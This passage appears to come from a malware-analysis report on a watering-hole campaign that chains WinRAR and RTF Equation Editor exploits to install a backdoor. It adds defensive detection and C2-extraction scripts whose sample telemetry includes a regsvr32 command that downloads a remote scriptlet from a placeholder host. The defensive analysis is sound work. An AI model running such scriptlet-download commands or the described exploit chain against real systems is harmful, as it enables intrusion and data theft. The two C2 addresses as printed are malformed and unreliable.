To protect the news site, we will obscure any related identifying information and refer to it as victim1 in the rest of this article. If we normalize and deobfuscate the JavaScript, as seen in Figure 3, we find that the script first checks cookie data to ensure that the visitor is coming from a Windows system. Second, it checks for the existence of “_utma”, a cookie that Google Analytics uses to distinguish users and sessions. If found, it would mean the actor wants fresh access to victim1. It then dynamically downloads a script from hxxps://click, and this injected script is able to execute arbitrary JavaScript delivered from that URL. We also found an analysis report mentioning a fake update campaign related to this URL; however, we did not observe attacks using this script during our research. For more details, here is the report.

Malware Analysis

Dual Exploits Used

An attack begins with an exploit for a vulnerable WinRAR (CVE-2018-20250). This exploit extracts a second exploit, an RTF file targeting CVE-2017-11882. There are two routes for this backdoor malware to infect the system.

WinRAR (CVE-2018-20250) exploit extracts backdoor

1. We can observe that this “.rar” file is really an “.ace” file, and that it carries a corresponding unpacking path, shown in the blue square of Figure 4. The file uses the WinRAR exploit to extract conf.exe to the Startup folder so that it is executed at system boot. However, this looks like a mistake or a test, because conf.exe is extracted to the right location only when the username is “test”. Interestingly, we also found that conf.exe is infected by Sality, an infamous file infector. When conf.exe is executed, both the backdoor payload in conf.exe and the Sality infector shellcode run at the same time.

RTF (CVE-2017-11882) exploit downloads backdoor

2. The extracted “.doc” file is really an “.rtf” file.
It triggers the Microsoft Equation Editor, which runs regsvr32.exe to connect to 154.222.14049 and download the next stage, a malicious scriptlet named 123.sct. The malware then saves its installation path, taken from the registry Run key “Software\Microsoft\Windows\CurrentVersion\Run”, to the file “/Destro”.

This malware contains stealthy functionality designed to collect system information and send it to its C2 server. It can also download files and create a reverse shell for further attacks. Among other things, it:

- Collects a directory list under a specific directory.
- Collects a file list in a specific directory.
- Collects data from other applications, such as Skype, Fetion, SogouInput and SogouDesktopBar.

The backdoor reads its C2 IP address from a constant RVA. In this campaign, it tries to connect to the following C2 address: 122.112.24578. Interestingly, we found that this backdoor always uses the name of a Chinese-native software product to lure the victim into executing it. At first it was a plain executable, but in 2018 it was changed to a DLL version. The DLL version of the backdoor is encrypted and stored in the data section of a loader program; when the loader runs, the backdoor DLL is decrypted and loaded into memory.
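The two infection routes above leave distinct traces in endpoint telemetry: WinRAR writing an executable into a Startup folder, and Equation Editor spawning regsvr32.exe to pull a remote .sct scriptlet. The following detection logic is an added example written for this article, not code from the report or from the malware; the events are constructed to resemble Sysmon process-creation and file-creation records, the C2 address 203.0.113.10 is a placeholder, and the exact regsvr32 command line (the /i:<url> scrobj.dll form) is an assumption, since the report does not print it.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    """Sysmon-style event (EID 1 process creation or EID 11 file creation)."""
    kind: str            # "process" or "file"
    image: str           # image of the process that acted
    parent: str = ""     # parent image (process events only)
    cmdline: str = ""    # full command line (process events only)
    target: str = ""     # file written (file events only)


# Per-user and all-users Startup folders, where the WinRAR exploit dropped conf.exe.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# regsvr32 loading a remote .sct scriptlet through scrobj.dll. This is the assumed
# shape of the invocation; the report only says regsvr32.exe fetched 123.sct.
SCRIPTLET_RE = re.compile(r"/i:\s*https?://\S+\.sct\b", re.IGNORECASE)
SCROBJ_RE = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> list:
    """Return the names of the rules that fire on one event."""
    hits = []
    if ev.kind == "process":
        img, parent = basename(ev.image), basename(ev.parent)
        # Equation Editor has no legitimate reason to spawn any child process.
        if parent == "eqnedt32.exe":
            hits.append("equation_editor_child_process")
        # regsvr32 registering a scriptlet from a URL is the 123.sct download stage.
        if (img == "regsvr32.exe" and SCRIPTLET_RE.search(ev.cmdline)
                and SCROBJ_RE.search(ev.cmdline)):
            hits.append("regsvr32_remote_scriptlet")
    elif ev.kind == "file":
        # An archiver writing an .exe straight into a Startup folder is the
        # CVE-2018-20250 path-traversal drop of conf.exe.
        if (basename(ev.image) == "winrar.exe" and STARTUP_RE.search(ev.target)
                and ev.target.lower().endswith(".exe")):
            hits.append("winrar_writes_exe_to_startup")
    return hits


def scan(events) -> list:
    """Run every rule over every event; returns (event index, rule name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


# Constructed sample telemetry: two benign events, one per malicious route, one benign drop.
SAMPLE_EVENTS = [
    Event("process", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
          parent=r"C:\Windows\explorer.exe", cmdline=r'"WINWORD.EXE" /n'),
    Event("process", r"C:\Windows\System32\regsvr32.exe",
          parent=r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
          cmdline=r"regsvr32 /s /n /u /i:http://203.0.113.10/123.sct scrobj.dll"),
    Event("process", r"C:\Windows\System32\regsvr32.exe",
          parent=r"C:\Windows\System32\msiexec.exe",
          cmdline=r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"),
    Event("file", r"C:\Program Files\WinRAR\WinRAR.exe",
          target=r"C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conf.exe"),
    Event("file", r"C:\Program Files\WinRAR\WinRAR.exe",
          target=r"C:\Users\test\Downloads\report.doc"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx].cmdline or SAMPLE_EVENTS[idx].target}")
```

The Equation Editor rule deliberately fires on any child process, not just regsvr32.exe, because the same CVE-2017-11882 trigger is routinely paired with mshta.exe, cmd.exe or PowerShell; the scriptlet rule is the one that ties the alert back to this specific campaign.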
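Because the backdoor reads its C2 address from a fixed RVA, an analyst can pull the C2 out of every sample of the family without running it, provided the RVA is translated into a file offset through the section table. The script below is an added example, not code from the report: it builds a minimal PE32 image in memory (constructed for the demonstration, with a placeholder C2 string at the assumed RVA 0x3010) and then resolves that RVA against the section headers exactly as a disassembler would; the report does not give the real sample's RVA, so substitute the one found in the binary.

```python
import struct


def build_sample_pe(c2: bytes, c2_rva: int = 0x3010) -> bytes:
    """Constructed stand-in for the backdoor: a PE32 with .text and .data sections
    and a NUL-terminated C2 string stored at c2_rva inside .data. Not a real sample."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew -> PE header
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)  # i386, 2 sections, PE32 opt hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    # (name, VirtualAddress, PointerToRawData); VirtualSize and SizeOfRawData are 0x200 each
    secs = [(b".text", 0x1000, 0x400), (b".data", 0x3000, 0x600)]
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, raw, 0, 0, 0, 0, 0x40000040)
        for name, va, raw in secs)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    image = bytearray(0x800)
    image[:len(headers)] = headers
    data_off = 0x600 + (c2_rva - 0x3000)
    image[data_off:data_off + len(c2) + 1] = c2 + b"\0"
    return bytes(image)


def parse_sections(pe: bytes) -> list:
    """Return (name, VirtualAddress, mapped size, PointerToRawData, SizeOfRawData) per section."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size                            # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         va, max(vsize, rawsize), rawptr, rawsize))
    return sections


def rva_to_offset(sections: list, rva: int):
    """Translate an RVA into a file offset; None if unmapped or in uninitialised (virtual-only) data."""
    for _name, va, size, rawptr, rawsize in sections:
        if va <= rva < va + size:
            delta = rva - va
            return rawptr + delta if delta < rawsize else None
    return None


def read_cstring(pe: bytes, offset: int, maxlen: int = 64) -> str:
    end = pe.find(b"\0", offset, offset + maxlen)
    if end == -1:
        end = offset + maxlen
    return pe[offset:end].decode("ascii", "replace")


def extract_c2(pe: bytes, rva: int):
    """The C2 string the backdoor keeps at a constant RVA, or None if the RVA does not map to file data."""
    offset = rva_to_offset(parse_sections(pe), rva)
    return None if offset is None else read_cstring(pe, offset)


# Constructed sample with a placeholder (TEST-NET) C2 address.
SAMPLE_PE = build_sample_pe(b"203.0.113.10:443")

if __name__ == "__main__":
    for sec in parse_sections(SAMPLE_PE):
        print(sec)
    print("C2 at RVA 0x3010:", extract_c2(SAMPLE_PE, 0x3010))
```

The same section walk is what you need for the DLL variant described above: locate the loader's data section by name, carve its raw bytes, and feed them to whatever decryption routine the loader uses, which the report does not specify.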